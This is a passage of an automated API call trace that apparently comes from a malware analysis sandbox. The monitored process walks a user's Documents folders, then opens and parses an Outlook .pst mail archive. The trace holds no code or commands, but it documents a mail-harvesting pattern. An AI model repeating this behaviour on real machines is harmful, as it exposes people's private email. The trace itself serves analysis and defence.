pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\EHP8OfZ1\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\EHP8OfZ1\\*" [0251.669] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\EHP8OfZ1\\*", lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0x5c0fbb0 [0251.670] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents\\EHP8OfZ1", pszFile="6qZ6qHJny0JO4qAx6K5" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\EHP8OfZ1\\6qZ6qHJny0JO4qAx6K5") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\EHP8OfZ1\\6qZ6qHJny0JO4qAx6K5" [0251.670] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents\\EHP8OfZ1\\6qZ6qHJny0JO4qAx6K5", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\EHP8OfZ1\\6qZ6qHJny0JO4qAx6K5\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\EHP8OfZ1\\6qZ6qHJny0JO4qAx6K5\\*" [0251.670] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\EHP8OfZ1\\6qZ6qHJny0JO4qAx6K5\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c0f2b0 [0251.672] PathCombineW (in: pszDest=0x235f210, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents", pszFile="gFAKFLS" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\gFAKFLS") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\gFAKFLS" [0251.672] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents\\gFAKFLS", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\gFAKFLS\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\gFAKFLS\\*" [0251.672] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\gFAKFLS\\*", lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0x5c0efb0 [0251.675] PathCombineW (in: pszDest=0x235f210, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents", pszFile="My Music" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music" [0251.675] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\*" [0251.675] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Music\\*", lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0xffffffffffffffff [0251.675] PathCombineW (in: pszDest=0x235f210, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents", pszFile="My Pictures" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures" [0251.675] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\*" [0251.675] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Pictures\\*", lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0xffffffffffffffff [0251.675] PathCombineW (in: pszDest=0x235f210, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents", pszFile="My Shapes" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes" [0251.675] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\*" [0251.675] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\*", lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0x5c103f0 [0251.676] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes", pszFile="_private" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private" [0251.676] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\*" [0251.676] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c0f2b0 [0251.677] PathCombineW (in: pszDest=0x235f210, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents", pszFile="My Videos" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos" [0251.677] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\*" [0251.677] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\My Videos\\*", lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0xffffffffffffffff [0251.677] PathCombineW (in: pszDest=0x235f210, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents", pszFile="OneNote Notebooks" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks" [0251.677] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\*" [0251.677] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\*", lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0x5c0f850 [0251.678] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks", pszFile="My Notebook" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook" [0251.678] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\*" [0251.678] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c103f0 [0251.679] PathCombineW (in: pszDest=0x235f210, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents", pszFile="Outlook Files" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files" [0251.679] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\*" [0251.679] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\*", lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0x5c0ee90 [0251.681] lstrcpyW (in: lpString1=0x235e860, lpString2="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files" [0251.681] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\" [0251.681] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\", lpString2="lcfkj@kiekc.df.pst" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst" [0251.681] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\lcfkj@kiekc.df.pst" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\outlook files\\lcfkj@kiekc.df.pst"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb48 [0251.682] SetFilePointer (in: hFile=0xb48, lDistanceToMove=0, lpDistanceToMoveHigh=0x235e780*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e780*=0) returned 0x0 [0251.682] ReadFile (in: hFile=0xb48, lpBuffer=0x235e798, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x235e790, lpOverlapped=0x0 | out: lpBuffer=0x235e798*, lpNumberOfBytesRead=0x235e790*=0x4, lpOverlapped=0x0) returned 1 [0251.688] SetFilePointer (in: hFile=0xb48, lDistanceToMove=10, lpDistanceToMoveHigh=0x235e780*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e780*=0) returned 0xa [0251.688] ReadFile (in: hFile=0xb48, lpBuffer=0x235e825, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x235e790, lpOverlapped=0x0 | out: lpBuffer=0x235e825*, lpNumberOfBytesRead=0x235e790*=0x1, lpOverlapped=0x0) returned 1 [0251.688] SetFilePointer (in: hFile=0xb48, lDistanceToMove=513, lpDistanceToMoveHigh=0x235e780*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e780*=0) returned 0x201 [0251.688] ReadFile (in: hFile=0xb48, lpBuffer=0x235e824, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x235e790, lpOverlapped=0x0 | out: lpBuffer=0x235e824*, lpNumberOfBytesRead=0x235e790*=0x1, lpOverlapped=0x0) returned 1 [0251.688] SetFilePointer (in: hFile=0xb48, lDistanceToMove=216, lpDistanceToMoveHigh=0x235e730*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e730*=0) returned 0xd8 [0251.689] ReadFile (in: hFile=0xb48, lpBuffer=0x235e710, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x235e748, lpOverlapped=0x0 | out: lpBuffer=0x235e710*, lpNumberOfBytesRead=0x235e748*=0x8, lpOverlapped=0x0) returned 1 [0251.689] SetFilePointer (in: hFile=0xb48, lDistanceToMove=224, lpDistanceToMoveHigh=0x235e730*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e730*=0) returned 0xe0 [0251.689] ReadFile (in: hFile=0xb48, lpBuffer=0x235e710, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x235e748, lpOverlapped=0x0 | out: lpBuffer=0x235e710*, lpNumberOfBytesRead=0x235e748*=0x8, lpOverlapped=0x0) returned 1 [0251.689] SetFilePointer (in: hFile=0xb48, lDistanceToMove=184, lpDistanceToMoveHigh=0x235e730*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e730*=0) returned 0xb8 [0251.689] ReadFile (in: hFile=0xb48, lpBuffer=0x235e710, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x235e748, lpOverlapped=0x0 | out: lpBuffer=0x235e710*, lpNumberOfBytesRead=0x235e748*=0x8, lpOverlapped=0x0) returned 1 [0251.689] SetFilePointer (in: hFile=0xb48, lDistanceToMove=232, lpDistanceToMoveHigh=0x235e730*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e730*=0) returned 0xe8 [0251.689] ReadFile (in: hFile=0xb48, lpBuffer=0x235e710, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x235e748, lpOverlapped=0x0 | out: lpBuffer=0x235e710*, lpNumberOfBytesRead=0x235e748*=0x8, lpOverlapped=0x0) returned 1 [0251.689] SetFilePointer (in: hFile=0xb48, lDistanceToMove=240, lpDistanceToMoveHigh=0x235e730*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e730*=0) returned 0xf0 [0251.689] ReadFile (in: hFile=0xb48, lpBuffer=0x235e710, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x235e748, lpOverlapped=0x0 | out: lpBuffer=0x235e710*, lpNumberOfBytesRead=0x235e748*=0x8, lpOverlapped=0x0) returned 1 [0251.689] LocalAlloc (uFlags=0x40, uBytes=0x200) returned 0x5cfdef0 [0251.689] SetFilePointer (in: hFile=0xb48, lDistanceToMove=57856, lpDistanceToMoveHigh=0x235e668*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e668*=0) returned 0xe200 [0251.689] ReadFile (in: hFile=0xb48, lpBuffer=0x5cfdef0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x235e678, lpOverlapped=0x0 | out: lpBuffer=0x5cfdef0*, lpNumberOfBytesRead=0x235e678*=0x200, lpOverlapped=0x0) returned 1 [0251.700] LocalAlloc (uFlags=0x40, uBytes=0x200) returned 0x5cfd4a0 [0251.700] SetFilePointer (in: hFile=0xb48, lDistanceToMove=37888, lpDistanceToMoveHigh=0x235e588*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e588*=0) returned 0x9400 [0251.700] ReadFile (in: hFile=0xb48, lpBuffer=0x5cfd4a0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x235e598, lpOverlapped=0x0 | out: lpBuffer=0x5cfd4a0*, lpNumberOfBytesRead=0x235e598*=0x200, lpOverlapped=0x0) returned 1 [0251.700] LocalAlloc (uFlags=0x40, uBytes=0x280) returned 0xd19fb90 [0251.701] LocalFree (hMem=0x5cfd4a0) returned 0x0 [0251.701] LocalAlloc (uFlags=0x40, uBytes=0x200) returned 0x5cfdce0 [0251.701] SetFilePointer (in: hFile=0xb48, lDistanceToMove=35840, lpDistanceToMoveHigh=0x235e588*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e588*=0) returned 0x8c00 [0251.701] ReadFile (in: hFile=0xb48, lpBuffer=0x5cfdce0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x235e598, lpOverlapped=0x0 | out: lpBuffer=0x5cfdce0*, lpNumberOfBytesRead=0x235e598*=0x200, lpOverlapped=0x0) returned 1 [0251.701] LocalReAlloc (hMem=0xd19fb90, uBytes=0x640, uFlags=0x2) returned 0x43e6890 [0251.701] LocalFree (hMem=0x5cfdce0) returned 0x0 [0251.701] LocalAlloc (uFlags=0x40, uBytes=0x200) returned 0x5cfce70 [0251.701] SetFilePointer (in: hFile=0xb48, lDistanceToMove=58368, lpDistanceToMoveHigh=0x235e588*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e588*=0) returned 0xe400 [0251.701] ReadFile (in: hFile=0xb48, lpBuffer=0x5cfce70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x235e598, lpOverlapped=0x0 | out: lpBuffer=0x5cfce70*, lpNumberOfBytesRead=0x235e598*=0x200, lpOverlapped=0x0) returned 1 [0251.701] LocalReAlloc (hMem=0x43e6890, uBytes=0xbe0, uFlags=0x2) returned 0x5d84300 [0251.701] LocalFree (hMem=0x5cfce70) returned 0x0 [0251.701] LocalAlloc (uFlags=0x40, uBytes=0x200) returned 0x5d00410 [0251.701] SetFilePointer (in: hFile=0xb48, lDistanceToMove=63488, lpDistanceToMoveHigh=0x235e588*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e588*=0) returned 0xf800 [0251.702] ReadFile (in: hFile=0xb48, lpBuffer=0x5d00410, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x235e598, lpOverlapped=0x0 | out: lpBuffer=0x5d00410*, lpNumberOfBytesRead=0x235e598*=0x200, lpOverlapped=0x0) returned 1 [0251.702] LocalFree (hMem=0x5d00410) returned 0x0 [0251.702] LocalAlloc (uFlags=0x40, uBytes=0x200) returned 0x5cfe310 [0251.702] SetFilePointer (in: hFile=0xb48, lDistanceToMove=28160, lpDistanceToMoveHigh=0x235e588*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e588*=0) returned 0x6e00 [0251.702] ReadFile (in: hFile=0xb48, lpBuffer=0x5cfe310, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x235e598, lpOverlapped=0x0 | out: lpBuffer=0x5cfe310*, lpNumberOfBytesRead=0x235e598*=0x200, lpOverlapped=0x0) returned 1 [0251.702] LocalFree (hMem=0x5cfe310) returned 0x0 [0251.702] LocalFree (hMem=0x5cfdef0) returned 0x0 [0251.702] LocalAlloc (uFlags=0x40, uBytes=0x200) returned 0x5cfe100 [0251.702] SetFilePointer (in: hFile=0xb48, lDistanceToMove=68096, lpDistanceToMoveHigh=0x235e678*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e678*=0) returned 0x10a00 [0251.702] ReadFile (in: hFile=0xb48, lpBuffer=0x5cfe100, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x235e688, lpOverlapped=0x0 | out: lpBuffer=0x5cfe100*, lpNumberOfBytesRead=0x235e688*=0x200, lpOverlapped=0x0) returned 1 [0251.702] LocalAlloc (uFlags=0x40, uBytes=0x200) returned 0x5cfed60 [0251.702] SetFilePointer (in: hFile=0xb48, lDistanceToMove=45056, lpDistanceToMoveHigh=0x235e5a8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e5a8*=0) returned 0xb000 [0251.703] ReadFile (in: hFile=0xb48, lpBuffer=0x5cfed60, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x235e5b8, lpOverlapped=0x0 | out: lpBuffer=0x5cfed60*, lpNumberOfBytesRead=0x235e5b8*=0x200, lpOverlapped=0x0) returned 1 [0251.703] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x5c0efb0 [0251.703] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84968 [0251.703] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x5c0f2b0 [0251.703] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84e18 [0251.703] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x5c0f850 [0251.703] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84af8 [0251.703] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x5c0f310 [0251.703] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d849b8 [0251.703] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x5c0fbb0 [0251.703] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84328 [0251.703] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x5c10870 [0251.703] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84350 [0251.704] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x5c10990 [0251.704] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x44044f0 [0251.704] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84cd8 [0251.704] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4404d90 [0251.704] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84d78 [0251.704] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4404790 [0251.704] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84300 [0251.704] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x44049d0 [0251.704] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84328 [0251.704] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4404f10 [0251.704] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84350 [0251.704] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4404f70 [0251.704] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84378 [0251.704] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4404fd0 [0251.704] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d845d0 [0251.705] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0xd1e11a0 [0251.705] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d843f0 [0251.705] LocalFree (hMem=0x5cfed60) returned 0x0 [0251.705] LocalAlloc (uFlags=0x40, uBytes=0x200) returned 0x5cffbd0 [0251.705] SetFilePointer (in: hFile=0xb48, lDistanceToMove=44032, lpDistanceToMoveHigh=0x235e5a8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e5a8*=0) returned 0xac00 [0251.705] ReadFile (in: hFile=0xb48, lpBuffer=0x5cffbd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x235e5b8, lpOverlapped=0x0 | out: lpBuffer=0x5cffbd0*, lpNumberOfBytesRead=0x235e5b8*=0x200, lpOverlapped=0x0) returned 1 [0251.705] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0xd1e1aa0 [0251.705] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d843c8 [0251.705] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0xd1e1b00 [0251.705] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d843a0 [0251.705] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0xd1e0d20 [0251.705] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84418 [0251.705] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0xd1df100 [0251.705] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84440 [0251.706] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0xd1df160 [0251.706] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84468 [0251.706] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0xd1e0b40 [0251.706] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84490 [0251.706] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x44067a0 [0251.706] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d844b8 [0251.706] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x44079a0 [0251.706] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4406a40 [0251.706] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4406e60 [0251.706] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4406380 [0251.706] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84d00 [0251.706] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x44070a0 [0251.706] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x44064a0 [0251.706] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84508 [0251.707] LocalFree (hMem=0x5cffbd0) returned 0x0 [0251.707] LocalAlloc (uFlags=0x40, uBytes=0x200) returned 0x5cff9c0 [0251.707] SetFilePointer (in: hFile=0xb48, lDistanceToMove=74752, lpDistanceToMoveHigh=0x235e5a8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e5a8*=0) returned 0x12400 [0251.707] ReadFile (in: hFile=0xb48, lpBuffer=0x5cff9c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x235e5b8, lpOverlapped=0x0 | out: lpBuffer=0x5cff9c0*, lpNumberOfBytesRead=0x235e5b8*=0x200, lpOverlapped=0x0) returned 1 [0251.707] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x5d02bd0 [0251.707] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x5d031d0 [0251.707] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84530 [0251.707] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x5d036b0 [0251.707] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84378 [0251.707] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x5d03470 [0251.707] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d847b0 [0251.707] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x5d03770 [0251.707] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84a80 [0251.708] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84a30 [0251.708] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x5d03bf0 [0251.708] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84328 [0251.708] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4397660 [0251.708] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84350 [0251.708] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4396fa0 [0251.708] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d844e0 [0251.708] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 